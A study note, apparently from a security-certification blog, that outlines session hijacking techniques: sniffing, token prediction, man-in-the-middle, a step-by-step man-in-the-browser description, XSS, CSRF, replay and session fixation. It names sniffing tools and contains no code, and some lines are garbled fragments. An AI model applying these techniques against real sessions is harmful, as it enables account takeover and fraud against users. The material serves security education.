Application Level Session Hijacking

In a session hijacking attack, a session token is stolen or valid session token is predicted to gain unauthorized access to the web server.

A session token can be compromised in various ways:

    • Session sniffing
    • Predictable session token
    • Man-in-the-middle attack
    • Man-in-the-browser attack
    • Cross-site script attack
    • Cross-site request forgery attack
    • Session replay attack
    • Session fixation

Compromising Sessions IDs using Sniffing

  • Attacker uses a sniffer to capture a valid session token or session ID.
  • Attacker then uses the valid token session to gain unauthorized access to the web server. 

Wireshark, SmartSniffer

Compromising Session IDs by Predicting Session Token

  • Attacker can predict session IDs generated by weak algorithms and impersonate a web site user.
  • Attackers perform analysis of variable section of session IDs to determine the existence of a pattern.
  • The analysis is performed manually or by using various cryptanalytic tools.
  • Attackers collect a high number of simultaneous session IDs in order to gather samples in the same time window and keep the variable constant.
  • (Hacker)foreground asp random session cookie <-> backstage session ID unbreakable
  • steal session -> sniffing ->Intranet
  • Transmissive mid-end acquisition:
    • http header
    • sniff
  • through the user browser:XSS
  • TCP/IP Session Hijacking Tool: hunt-1.5
    • forge IP/Port/SeqNo./ACKNo. 

How to Predict a Session Token

Compromising Session IDs Using Man-in-the-Middle Attack

  • The man-in-the-middle attack is used to intrude into an existing connection between systems and to intercept messages being exchanged.
  • Attackers use different techniques and split the TCP connection into two connections.
    • Client-to-attacker connection
    • Attacker-to-־server connection
  • After the successful interception of TCP connection, an attacker can read, modify, and insert fraudulent data into the intercepted communication.
  • In the case of an http transaction, the TCP connection between the client and the server becomes the target. 

Compromising Session IDs Using Man-in-the-Browser Attack

  • Man-in-the-browser attack uses a Trojan Horse to intercept the calls between the browser and its security mechanisms or libraries.
  • It works with an already installed Trojan horse and acts between the browser and its security mechanisms.
  • Its main objective is to cause financial deceptions by manipulating transactions of Internet Banking systems.

The man-in-the-browser attack will be successful irrespective of security mechanisms such as SSL, PKI, or two-factor authentication in place, as all the expected controls and security mechanisms would seem to work normally.

Steps to Perform Man-in-the-Browser Attack

  1. The Trojan first infects the computer’s software (OS or application).
  2. The Trojan installs malicious code (extension files) and saves it into the browser configuration.
  3. After the user restarts the browser, the malicious code in the form of extension files is loaded.
  4. The extension files register a handler for every visit to the webpage.
  5. When the page is loaded, the extension uses the URL and matches it with a list of known sites targeted for attack.
  6. The user logs in securely to the website.
  7. It registers a button event handler when a specific page load is detected for a specific pattern and compares it with its targeted list.
  8. When the user clicks on the button, the extension uses DOM interface and extracts all the data from all form fields and modifies the values.
  9. The browser sends the form and modified values to the server.
  10. The server receives the modified values but cannot distinguish between the original and the modified values.
  11. After the server performs the transaction, a receipt is generated.
  12. Now, the browser receives the receipt for the modified transaction.
  13. The browser displays the receipt with the original details.
  14. The user thinks that the original transaction was received by the server without any interceptions.
After the browser is infected by the Trojan, the Trojan can modify the web page, modify or add any data in http(s). 
Neither the user nor the server know about this process.

Compromising Session IDs Using Client-side Attacks

  • Cross-Site Scripting (XSS): XSS enables attackers to inject malicious client side scripts into the web pages viewed by other users.
  • Malicious JavaScript Codes: A malicious script can be embedded in a web page that does not generate any warning but it captures session tokens in the background and send it to the attacker.
  • Trojans: A Trojan horse can change the proxy settings in user’s browser to send all the sessions through the attackers machine.

Compromising Session IDs Using Client-side Attacks: Cross-site Script Attack 

  • If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker. 
  • Defend:HttpOnly

Compromising Session IDs Using Client-side Attacks: Cross-site Request Forgery Attack 

  • Cross-Site Request Forgery (CSRF) attack exploits victim’s active session with a trusted site in order to perform malicious activities. 

a.k.a. one-click attack or session riding

Compromising Session IDs Using Client-side Attacks: Session Replay Attack

  • In a session replay attack, the attacker listens to the conversation between the user and the server and captures the authentication token of the user.
  • Once the authentication token is captured, the attacker replays the request to the server with the captured authentication token and gains unauthorized access to the server. 

Compromising Session IDs Using Session Fixation

  • Session Fixation is an attack that allows an attacker to hijack a valid user session.
  • The attack tries to lure a user to authenticate himself with a known session ID and then hijacks the user-validated session by the knowledge of the used session ID.
  • The attacker has to provide a legitimate web application session ID and try to lure victim browser to use it.
  • Several techniques to execute Session Fixation attack are:
    • Session token in the URL argument
    • Session token in a hidden form field
    • Session ID in a cookie

Session Fixation Attack

  • Attacker exploits the vulnerability of a server which allows a user to use fixed SID.
  • Attacker provides a valid SID to a victim and lures him to authenticate himself using that SID. 
  • There are three phases to carry out Session fixation attack:
    • Session set-up phase: Make a normal request to the website session ID,But since the website may have idle session time-out mechanism,so keep repeating the request to let this group the session ID survive。
    • Fixation phase: Let the victim use this set session ID。
    • Entrace phase: Wait for the victim to use this set session ID after login,An attacker can directly use the set of session ID done。

Session Hijacking Using Proxy Servers

  • Attacker lure victim to click on bogus link which looks legitimate but redirect user to attacker server.
  • Attacker forwards request to the legitimate server on behalf of victim and serve as a proxy for the entire transaction.
  • Attacker then captures the sessions information during interaction of legitimate server and user.

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *